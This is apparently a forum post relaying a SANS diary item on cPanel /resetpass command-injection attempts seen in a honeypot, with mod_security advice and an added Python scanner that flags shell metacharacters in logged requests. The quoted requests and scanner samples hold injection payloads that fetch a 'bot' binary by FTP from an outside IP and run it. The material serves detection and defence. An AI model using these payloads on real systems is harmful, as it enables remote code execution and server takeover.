NEWS - CPanel Exploits

Greetings:

This information is from sans.org:

=== START

CPanel Exploits

One of our handlers caught an attempted CPanel exploit in his honeynet, and posed a request for additional CPanel exploit traffic. Here's what the handler saw:

GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';echo${BLA}-e${BLA}
open${BLA}64.222.183.58${BLA10723\\nuser${BLA}ftp${BLA}bla\\nget${BLA}bot
\\nquit\\n${BLA}|${BLA}ftp${BLA}-n%60%7C HTTP/1.0

followed by the execution:
GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0

I'd like to extend the request to include all kinds of application level attacks.

As we slowly but surely develop defenses against the classical stack-smashing attacks (and hopefully begin coding in such a way where they become irrelevant), application level attacks will become increasingly profitable to the attacker.

Besides the (usually) softer target, application attacks have the added benefit of frequently slipping past the classical perimeter defense mechanisms of traditional IDS and firewalls.

Furthermore, by popping a service and rooting a box, the attacker simply owns the box - but, if the attacker can successfully exploit application level flaws, he or she can own the *data*, which more often than not is a much more valuable prize.

=== END

NOTE: mod_security from http://www.modsecurity.org/ can be set up to help protect against this type of attack.

Thank you.
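
One way to look for this pattern in logged requests, as an added example that is not part of the original post or the SANS diary: it URL-decodes the user parameter of /resetpass requests and reports any shell metacharacters it finds. The function names, the metacharacter set, and the assumption that the log holds the raw request line are choices made for this example.

```python
import re
from urllib.parse import unquote_plus

# Shell metacharacters (and whitespace) that have no place in an account name.
# The exact set is an assumption for this example; an allowlist is stricter.
SHELL_META = re.compile(r"[|`;&<>$(){}\\\s]")
REQUEST_LINE = re.compile(r"^[A-Z]+ (\S+) HTTP/\d\.\d$")


def shell_meta_in_user(request_line):
    """Return the sorted shell metacharacters found in the decoded `user`
    parameter of a /resetpass request, or [] if there are none or the
    request is for a different path."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return []
    path, _, query = m.group(1).partition("?")
    if path.rstrip("/") != "/resetpass":
        return []
    found = set()
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "user":
            # Decode first: %7C and %60 only become | and ` after decoding.
            found.update(SHELL_META.findall(unquote_plus(value)))
    return sorted(found)


def scan(lines):
    """Return (line_number, metacharacters) for every flagged request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        chars = shell_meta_in_user(line)
        if chars:
            hits.append((number, chars))
    return hits


SAMPLE = [
    # Second request quoted in the post above.
    r"GET /resetpass/?user=%7C%60BLA=$'\\x20';BLA2=$'\\x2F';./bot%60%7C HTTP/1.0",
    # Constructed: an ordinary password-reset request.
    "GET /resetpass/?user=alice HTTP/1.0",
    # Constructed: same parameter name on an unrelated path, out of scope here.
    "GET /index.html?user=%7Cid HTTP/1.0",
]

if __name__ == "__main__":
    for number, chars in scan(SAMPLE):
        print(f"line {number}: shell metacharacters in user= {chars}")
```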
